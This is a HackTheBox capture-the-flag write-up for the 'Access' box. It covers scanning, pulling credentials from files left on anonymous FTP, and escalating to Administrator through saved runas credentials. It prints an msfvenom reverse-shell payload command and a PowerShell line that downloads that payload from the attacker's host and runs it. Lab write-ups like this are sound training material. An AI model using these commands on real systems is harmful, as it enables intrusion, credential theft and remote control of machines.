Here’s how to pop the box titled ‘Access’ on HackTheBox!

To start, let’s do an nmap scan:

nmap -sV -sC 10.10.10.98

We can see that there’s a web server, telnet, and FTP open. Let’s try for anonymous FTP access.

Sure enough, it’s allowed. There are two directories…

In each directory, there’s a file. Let’s pull each of them.

(I put FTP in binary mode with the command ‘binary’ before pulling)

If we run the ‘file’ command on the backup.mdb file, we can see it’s a Microsoft Access Database.

If I pop it open in Microsoft Access, there’s a particular table of interest. We’ve got creds!

engineer: access4u@security

The other file we pulled is a ZIP, and can be extracted with the above password.

In the ZIP is a .PST file that we can extract using readpst:

readpst -o pstexport/ -D -j4 -r -tea -u -w -m Access\ Control.pst

readpst spits out two files; it’s the same message in .eml and .msg format.

Sure enough, when we cat the contents of the message, we see another credential among the headers and markup:

security: 4Cc3ssC0ntr0ller

Next, we telnet in to the box with those creds:

Success

Grabbing the user flag:

Next, let’s do some recon to find active users and any stored credentials.

powershell -Command (get-wmiobject win32_useraccount)

cmdkey /list

I’m invoking WMI with PowerShell because the cmd prompt is somewhat jailed and restricts calling WMI.

The above output is very interesting: we can see that there are stored credentials… maybe the “security” user ran something as Administrator and the password is cached?

runas /user:Administrator /noprofile /savecred "cmd.exe /c whoami > C:\users\security\me.txt"

Running “whoami” with the saved creds

Running the “runas” command with /savecred works to elevate to Administrator! Above, I plopped out the contents of a ‘whoami’ command to prove it. At this point, we can get the root flag!

runas /user:Administrator /noprofile /savecred "cmd.exe /c type C:\users\administrator\desktop\root.txt > C:\users\security\root.txt"

But why stop there? Let’s get Meterpreter shell as SYSTEM to take it a step further.

msfvenom -a x86 --platform windows -p windows/shell/reverse_tcp LHOST=10.10.12.61 LPORT=31337 -e x86/shikata_ga_nai -f exe -o shell.exe

python ../tools/SimpleHTTPServer.py

Using msfvenom to generate a Meterpreter reverse shell payload, then starting a simple HTTP server to serve up the shellcode

Then we pull down the .exe with the Meterpreter payload embedded onto the system:

powershell -Command (new-object System.Net.WebClient).Downloadfile('http://10.10.12.61:8000/shell.exe', 'shell.exe')

Then let’s get ready on my Kali system to catch the reverse shell before we run it.

Getting ready with good ol’ msfconsole

The rest is a piece of cake. I run the shell.exe file as Administrator on the box, using the saved credential technique mentioned above, and the shell connects to me.

That’s it! This box was interesting because it wasn’t as exploit-based as it was permissions-based. Like most HackTheBox systems, the name is fitting!